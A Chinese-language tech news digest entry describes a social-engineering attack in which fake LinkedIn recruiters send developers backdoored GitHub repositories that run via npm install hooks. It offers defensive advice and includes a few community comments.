招聘陷阱:GitHub 仓库藏后门
推荐指数 54.0 NO. 015 · 2026.06.16
发布2026/06/15Score101Comments19
为什么值得看
攻击者伪装成 LinkedIn 招聘人员,向目标发送含恶意后门的 GitHub 仓库,以"代码审查"为由诱导克隆执行。这是针对开发者的新型社工攻击,AI 工程师常接触外部代码,极易成为目标。
媒体预览
编辑判断
这类攻击的狡猾之处在于利用了开发者日常工作的信任链条——代码审查是正常流程,GitHub 是可信平台。攻击者特意选择"deprecated Node modules"作为切入点,因为 npm install 是自动执行脚本的常见场景,开发者几乎不会逐行审计依赖安装脚本。
对 AI 工程师尤其危险:你们经常需要 clone 开源模型权重、评测工具、微调脚本,且习惯直接跑 pip install 或 npm install。建议养成习惯:所有外部代码先在隔离容器或云端沙箱打开,检查 package.json 和 install 钩子,对任何主动联系你的"招聘方"做反向背景调查。
社区反馈
负面 21 条评论
核心争论:开发者对执行外部代码的风险认知不足,社工攻击利用求职焦虑难以防范
Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast. Remember to use protection when meeting random people, and putting their junk deep inside your computer!
Or running random curl | bash scripts from GitHub, AUR, NPM are just as bad but many developers here still have dubious assumptions on this bad practice. The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.